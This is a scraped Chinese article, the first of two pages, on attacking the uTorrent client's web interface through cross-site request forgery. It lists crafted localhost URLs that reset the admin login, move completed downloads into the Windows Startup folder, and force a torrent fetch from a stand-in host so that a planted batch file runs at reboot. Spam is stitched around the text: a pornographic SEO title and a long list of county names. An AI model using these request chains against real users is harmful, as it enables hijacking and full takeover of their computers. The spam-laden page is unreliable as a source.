国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

利用基于Web的黑客技術造攻擊uTorrent客戶端(1)
2008-12-11   

uTorrent是一款優秀的BT下載客戶端軟件,它具有個頭小巧,界面清爽,下載速度快等諸多優點,所以廣受喜歡用BT下載的用戶的歡迎。但是,我想要說的是,親愛的uTorrent用戶們,小心了,黑客正在向我們襲來……

人們已經發現了幾個CSRF漏洞,將它們組合起來就能對uTorrent的Web用戶界面及其底層的系統造成破壞性的打擊——攻擊者不僅可以強迫uTorrent下載任意的torrents文件,還能把下載后的文件移動到系統中的任意目錄下,并最終完全控制受害者的計算機。下面開始介紹黑客們的攻擊手法。

一、篡改登錄信息

眼下,有越來越多的軟件開始采用Web 應用程序接口,例如BitTorrent客戶端就是一個很好的例子。人們始料未及的是,web接口通常易于受到攻擊,攻擊者利用web接口的最大困難只是難于獲悉web接口的精確位置。 雖然遠程執行代碼也是可能的,但是這并非一個非常嚴重的安全漏洞,因為它難以利用。所以,針對BitTorrent客戶端的攻擊數量將超過對BitTorrent服務器的攻擊。

下面我們詳細介紹如何通過跨站請求偽造技術來修改uTorrent的Web用戶界面登錄信息。我們知道,利用CSRF可以修改Web用戶界面所需的用戶名和口令,但是攻擊者要想修改這些用戶名和口令的話,前提是用戶已經登錄——但是這對于攻擊者來說并非難事,通過社交工程就能達到這一目的。

好了,現在假設用戶已經登錄,那么利用下列精心構造的URL,攻擊者就能修改uTorrent管理員登錄信息:

http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096

構造好上述的陷阱后,攻擊者所要做的只是誘騙用戶點擊這些URL。當然,攻擊者不會傻到直接將這些鏈接信息暴露給用戶,他們可以通過多種方法來做掩護。當更改用戶名和密碼之后,瀏覽器必須重新進行身份驗證,方法如下:

http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1

二、強迫uTorrent執行下載的文件

利用CSRF可以修改Web用戶界面所需的用戶名和口令,但是攻擊者要想修改這些用戶名和口令的話,前提是用戶已經登錄——但是這對于攻擊者來說并非難事,通過社交工程就能達到這一目的。對于本文所介紹的攻擊,我們假設用戶已經通過了uTorrent的Web用戶界面的身份驗證。

首先,攻擊者需要設法讓選擇的文件進入一個計算機,更重要的是,攻擊者還得設法把它放在他們指定的目錄中。我們看一下正常情況下,用戶是如何為下載的文件指定存放目錄的。我們需要打開uTorrent的“Move completed downloads to”選項。

 
圖1

然后,我們還得告訴uTorrent將下載好的文件移動到哪一個目錄下。

 
圖2  指定目錄

我們知道,利用跨站請求偽造技術,攻擊者能夠以用戶的身份來行事,因為前面我們已經假設用戶已經登錄到客戶端了。所以,攻擊者所要做的只是設法讓用戶點擊上圖中的URL即可,如下所示:

http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup

這時,他們的uTorrent的下載首選項現在將變成下面的樣子:

 
圖3  修改后的首選項

這樣的話,下載后的文件將被移動到All Users的啟動文件夾,并且只要攻擊者能夠強迫用戶下載文件,實際上他們就已經得手了。例如,攻擊者可以通過下列方法來強迫用戶下載一個torrent文件:

http://localhost:14774/gui/?action=add-url&s=http://www.whatever.com/file.torrent

假設該torrent文件讓uTorrent下載一個名為pwn.bat的文件。下載一旦完成,pwn.bat就會位于啟動文件夾,所以當用戶重新引導系統時該文件就會被執行。但是等一下,情況還會更糟……


共2頁: 1 [2] 下一頁
 第 1 頁:  第 2 頁:uTorrent客戶端中的跨站腳本漏洞

熱詞搜索:

上一篇:托管注入深入研究
下一篇:利用IIS寫權限成功滲透西南某高校OA系統(1)

分享到: 收藏
主站蜘蛛池模板: 南溪县| 加查县| 韶关市| 固原市| 苍山县| 武强县| 伊吾县| 新泰市| 囊谦县| 武威市| 德钦县| 黄浦区| 云安县| 高密市| 天峨县| 大庆市| 黔江区| 邵武市| 德格县| 宝清县| 洛隆县| 双鸭山市| 茂名市| 云龙县| 威远县| 郎溪县| 颍上县| 剑河县| 固始县| 天长市| 兰溪市| 汉阴县| 越西县| 大宁县| 平定县| 呼图壁县| 扶风县| 清涧县| 丽水市| 新平| 孝感市|